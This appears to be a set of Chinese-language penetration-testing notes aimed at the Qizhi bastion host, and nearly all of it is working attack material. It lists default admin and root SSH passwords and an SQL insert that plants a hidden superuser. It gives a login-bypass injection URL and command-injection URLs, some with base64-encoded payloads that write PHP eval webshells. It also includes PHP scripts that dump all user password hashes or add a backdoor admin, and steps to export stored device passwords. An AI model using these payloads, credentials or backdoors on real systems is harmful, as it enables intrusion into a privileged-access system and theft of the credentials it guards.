齐治
目录
怎么判断堡垒机是java还是php?用chrome插件wappalyzer!
堡垒机JAVA
app="齐治科技-堡垒机"
默认口令
默认账号密码为admin/admin
SSH用户:root
SSH密码:4OO88O2393
前渗透
无公开漏洞
后渗透
创建超级用户
登录数据库
psql -U shterm -h 127.0.0.1 -d shterm
执行
INSERT INTO "public"."tbl_user" ("id", "login_name", "user_name", "passwd", "email", "role_id", "authtype_id", "auth_info", "state", "ext_info", "extra", "last_login_time", "pwd_change_time", "authtoken_id", "valid_from", "valid_to", "pwd_valid", "join_time", "join_user", "update_time", "deleted", "remark", "ssh_key", "user_type", "region_id", "delete_time", "disabled_time", "department_id", "audit_scope", "user_category") VALUES (10088, 'shtermManager', 'shtermManager', '{bcrypt}$2a$10$5Jt5ncvrj5rBZtfQR6YQaeWIuqqJZd1k1KSU23umZeFU89fCYu4la', NULL, 1, 1, '{"passwordType": "custom"}', 0, '{}', '{"locale": {"country": "CN", "language": "zh"}, "userNav": [{"name": "User.nav_All", "useOr": false, "filters": []}, {"name": "role.ROLE_CONFIG", "useOr": false, "filters": [{"attr": "role.id", "oper": "In", "value": "2"}]}, {"name": "role.ROLE_ADMIN", "useOr": false, "filters": [{"attr": "role.id", "oper": "In", "value": "1"}]}, {"name": "User.nav_NoGroup", "useOr": false, "filters": [{"attr": "usergroups", "oper": "Null", "value": "true"}]}, {"name": "User.state.3", "useOr": false, "filters": [{"attr": "state", "oper": "In", "value": "3"}]}, {"name": "User.state.2", "useOr": false, "filters": [{"attr": "state", "oper": "In", "value": "2"}]}, {"name": "User.state.1", "useOr": false, "filters": [{"attr": "state", "oper": "In", "value": "1"}]}, {"name": "User.nav_Inactive", "useOr": true, "filters": [{"attr": "lastLoginTime", "oper": "Before", "value": "2021-08-21"}, {"attr": "lastLoginTime", "oper": "Null", "value": "true"}]}], "appOldNav": [{"name": "dev.appall", "count": 0, "useOr": false, "filters": [{"attr": "type", "oper": "Is", "value": "3"}, {"attr": "state", "oper": "Is", "value": "0"}, {"attr": "deleted", "oper": "Is", "value": "false"}]}, {"name": "B/S", "count": 0, "useOr": false, "filters": [{"attr": "sysType.name", "oper": "Contains", "value": "B/S"}, {"attr": "type", "oper": "Is", "value": "3"}, {"attr": "state", "oper": "Is", "value": "0"}, {"attr": "deleted", "oper": "Is", "value": "false"}]}, {"name": "C/S", "count": 0, "useOr": false, "filters": [{"attr": "sysType.name", "oper": "Contains", "value": "C/S"}, {"attr": "type", "oper": "Is", "value": "3"}, {"attr": "state", "oper": "Is", "value": "0"}, {"attr": "deleted", "oper": "Is", "value": "false"}]}, {"name": "Weblogic", "count": 0, "useOr": false, "filters": [{"attr": "sysType.name", "oper": "Contains", "value": "Weblogic"}, {"attr": "type", "oper": "Is", "value": "3"}, {"attr": "state", "oper": "Is", "value": "0"}, {"attr": "deleted", "oper": "Is", "value": "false"}]}, {"name": "B/S IE", "count": 0, "useOr": false, "filters": [{"attr": "sysType.name", "oper": "Contains", "value": "B/S IE"}, {"attr": "type", "oper": "Is", "value": "3"}, {"attr": "state", "oper": "Is", "value": "0"}, {"attr": "deleted", "oper": "Is", "value": "false"}]}], "devOldNav": [{"name": "dev.hostall", "count": 0, "useOr": false, "filters": [{"attr": "type", "oper": "Is", "value": "0"}, {"attr": "state", "oper": "Is", "value": "0"}, {"attr": "deleted", "oper": "Is", "value": "false"}]}, {"name": "Linux", "count": 0, "useOr": false, "filters": [{"attr": "sysType.name", "oper": "Contains", "value": "Linux"}, {"attr": "type", "oper": "Is", "value": "0"}, {"attr": "state", "oper": "Is", "value": "0"}, {"attr": "deleted", "oper": "Is", "value": "false"}]}, {"name": "Windows", "count": 0, "useOr": false, "filters": [{"attr": "sysType.name", "oper": "Contains", "value": "Windows"}, {"attr": "type", "oper": "Is", "value": "0"}, {"attr": "state", "oper": "Is", "value": "0"}, {"attr": "deleted", "oper": "Is", "value": "false"}]}, {"name": "HP UX", "count": 0, "useOr": false, "filters": [{"attr": "sysType.name", "oper": "Contains", "value": "HP UX"}, {"attr": "type", "oper": "Is", "value": "0"}, {"attr": "state", "oper": "Is", "value": "0"}, {"attr": "deleted", "oper": "Is", "value": "false"}]}, {"name": "IBM AIX", "count": 0, "useOr": false, "filters": [{"attr": "sysType.name", "oper": "Contains", "value": "IBM AIX"}, {"attr": "type", "oper": "Is", "value": "0"}, {"attr": "state", "oper": "Is", "value": "0"}, {"attr": "deleted", "oper": "Is", "value": "false"}]}, {"name": "IBM AS/400", "count": 0, "useOr": false, "filters": [{"attr": "sysType.name", "oper": "Is", "value": "IBM AS/400"}, {"attr": "type", "oper": "Is", "value": "0"}, {"attr": "state", "oper": "Is", "value": "0"}, {"attr": "deleted", "oper": "Is", "value": "false"}]}], "accessServ": {"changepwd": 1690250316342, "automation": 1690250226507, "deviceaccess": 1690199078938}, "indexWidgets": [], "changePlanNav": [{"name": "secretChangePlan.nav_plan_All", "filters": [{"attr": "status", "oper": "Is", "value": "0"}]}, {"name": "secretChangePlan.nav_plan_maunl", "filters": [{"attr": "execType", "oper": "Is", "value": "1"}, {"attr": "status", "oper": "Is", "value": "0"}]}, {"name": "secretChangePlan.nav_plan_fail", "filters": [{"attr": "execResult", "oper": "Is", "value": "2"}, {"attr": "status", "oper": "Is", "value": "0"}]}], "updateListNav": [{"name": "cloud.update.all", "useOr": false, "filters": []}, {"name": "cloud.process.1", "useOr": false, "filters": [{"attr": "status", "oper": "Is", "value": "1"}]}, {"name": "cloud.process.4", "useOr": false, "filters": [{"attr": "status", "oper": "Is", "value": "4"}]}, {"name": "cloud.process.2", "useOr": false, "filters": [{"attr": "status", "oper": "Is", "value": "2"}]}, {"name": "cloud.process.3", "useOr": false, "filters": [{"attr": "status", "oper": "Is", "value": "3"}]}], "databaseOldNav": [{"name": "dev.databaseall", "count": 0, "useOr": false, "filters": [{"attr": "type", "oper": "Is", "value": "2"}, {"attr": "state", "oper": "Is", "value": "0"}, {"attr": "deleted", "oper": "Is", "value": "false"}]}, {"name": "Oracle", "count": 0, "useOr": false, "filters": [{"attr": "sysType.name", "oper": "Contains", "value": "Oracle"}, {"attr": "type", "oper": "Is", "value": "2"}, {"attr": "state", "oper": "Is", "value": "0"}, {"attr": "deleted", "oper": "Is", "value": "false"}]}, {"name": "MYSQL", "count": 0, "useOr": false, "filters": [{"attr": "sysType.name", "oper": "Contains", "value": "MYSQL"}, {"attr": "type", "oper": "Is", "value": "2"}, {"attr": "state", "oper": "Is", "value": "0"}, {"attr": "deleted", "oper": "Is", "value": "false"}]}, {"name": "MSSQL", "count": 0, "useOr": false, "filters": [{"attr": "sysType.name", "oper": "Contains", "value": "MSSQL"}, {"attr": "type", "oper": "Is", "value": "2"}, {"attr": "state", "oper": "Is", "value": "0"}, {"attr": "deleted", "oper": "Is", "value": "false"}]}, {"name": "DB2", "count": 0, "useOr": false, "filters": [{"attr": "sysType.name", "oper": "Contains", "value": "DB2"}, {"attr": "type", "oper": "Is", "value": "2"}, {"attr": "state", "oper": "Is", "value": "0"}, {"attr": "deleted", "oper": "Is", "value": "false"}]}]}', '2021-11-21 04:04:04.612', '2021-11-21 09:55:32.875', NULL, NULL, NULL, 0, NULL, NULL, '2021-11-21 09:55:32.875', 'f', NULL, NULL, 0, NULL, NULL, NULL, 1, NULL, 0);
用户名:shtermManager
密码:Shterm10086
登录后修改密码,即可获得完整权限
向主机下发命令
工作台→自动化→增加脚本任务→添加目标资产→自定义命令→立即执行
访问资产
- web服务访问:工作台→访问资产
- rdp访问:rdp登录堡垒机,输入web服务的账户密码,进去后就是可登录列表
- ssh访问:输入web服务的账户密码,进去后就是可登录列表
堡垒机PHP
前渗透
任意用户登录
http://xxx.xxx.xxx.xxx/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm
状态码返回200,存在漏洞;“错误ID”提示,不存在漏洞。
后台rce
/audit/data_provider.php?ds_y=2019&ds_m=04&ds_d=02&ds_hour=09&ds_min40&server_cond=&service=$(id)&identity_cond=&query_type=all&format=json&browse=true
或者
/audit/data_provider.php?ds_y=2019&ds_m=04&ds_d=02&ds_hour=09&ds_min40&server_cond=&service=127.0.0.1&identity_cond=&query_type=all&format=json&browse=true&priority=`id`
写webshell到 /var/www/icons/tui/,然后访问/icons/tui/service.php
/audit/data_provider.php?ds_y=2019&ds_m=04&ds_d=02&ds_hour=09&ds_min40&server_cond=&service=127.0.0.1&identity_cond=&query_type=all&format=json&browse=true&priority=`echo${IFS}ZWNobyAnPD9waHAgQGV2YWwoJF9QT1NUWzkwXSk7Pz4nID4gL3Zhci93d3cvaWNvbnMvdHVpL3NlcnZpY2UucGhw|base64${IFS}-d|sh`
前台RCE(CNVD-2019-20835)
访问如下url返回ok即存在。
/listener/cluster_manage.php
然后访问如下链接,即可在根目录 /var/www/shterm/resources/qrcode/lbj77.php 下生成PHP一句话马
https://10.20.10.10/ha_request.php?action=install&ipaddr=localhost&node_id=1${IFS}|`echo${IFS}" ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}- d|bash`|${IFS}|echo${IFS}
然后访问如下链接即可使用webshell
/resources/qrcode/lbj77.php
后渗透
获取管理员密码
拿到shell后,在 /icons/tui/ 目录下新建 common.php 文件,然后访问 /icons/tui/common.php即可看到各用户hash,hash可到cmd5解密
<?PHP
$CONFIG["nomenu"] = true;
$CONFIG["nochangepw"] = true;
require_once("/var/www/shterm/include/common.php");
$q1 = pg_escape("SELECT count(*) FROM identity");
$r1 = pg_fetch_assoc($q1);
echo "用户数量:";
print_r($r1);
$q = pg_escape("SELECT * FROM identity");
$i = 0;
while($r = pg_fetch_assoc($q)){
++$i;
echo "
";
echo "
id :" . $r["id"];
if($r["status"] == 1){$status = "否";}else{$status = "是";}
echo "
是否禁用 :" . $status;
if( $r["role_admin"] == 1 && $r["role_manager"] == 1 && $r["role_audit"] == 1 && $r["role_shell"]==1 && $r["role_pwrcpt"]==1 ){
$usertype = "超级管理员";
}elseif ($r["role_admin"] == 1) {
$usertype = "超级管理员";
}elseif ($r["role_manager"] == 1) {
$usertype = "配置管理员";
}elseif ($r["role_audit"] == 1) {
$usertype = "审计管理员";
}elseif ($r["role_shell"] == 1) {
$usertype = "普通用户";
}elseif ($r["role_pwrcpt"] == 1) {
$usertype = "密码保管员";
}
echo "
用户类型 :" . $usertype;
echo "
登录名:" . $r["login"];
echo "
姓名:" . $r['name'];
echo "
密码信息:" . $r['auth_data'];
}
?>
新建管理员
如果管理员密码实在无法解密,就新建一个吧。
在 /icons/tui/ 目录下新建 about.php 文件
用户名:360team
密码: shterm
<?PHP
$CONFIG["nomenu"] = true;
$CONFIG["nochangepw"] = true;
require_once("/var/www/shterm/include/common.php");
$q2 = pg_escape("INSERT INTO identity(id,status,login,name,company,department,domain,post,number,email,mobile,auth_method,auth_data,x509_dn,auth,passwd_salt,passwd_sha1,passwd_expire,passwd_change,ipaddr_limit,crypt_passwd,pgp_pubkey,role_admin,role_manager,role_audit,role_shell,role_pwrcpt,default_dept,valid_date1,valid_date2,create_stamp,modify_stamp,create_identity,lastlogin_stamp,tui_client,server_grid_way,remark,theme,client_tuires,client_guires,totp_params,challenge_message,challenge_state,options,attrs,perms) VALUES(100900,'1','360team','360team','','ROOT','1','','','','','1','{\"hash\": \"9a15a976afaefb1d3e1ac21f62be336e2054c3d0\", \"times\": 1, \"expire\": \"\", \"algo\": \"shterm1\", \"salt\": \"nukj4rT0aa\", \"change\": false}','','native','','',null,null,'','','',1,1,1,1,1,null,null,null,null,'2023-01-13 10:44:17.965318',null,'2023-01-16 13:14:47.295477','','','','','','','','','','{\"perms\":\"\"}','','{\"manager\":[1],\"audit\":[1],\"pwrcpt\":[1]}')");
$r2 = pg_fetch_assoc($q2);
echo "新增用户成功";
设备密码导出
首先把账户弄成密码保管员权限。 然后点击账户设置→修改设置(输入用户的登录密码)→zip文件密码设置zip解压密码。 然后密码控制→密码备份即可导出一份密码本zip,解压密码为刚刚设置好的zip解压密码。 如果要连接设备,可以直接ssh或者rdp上去连,用户密码为堡垒机web服务的用户密码.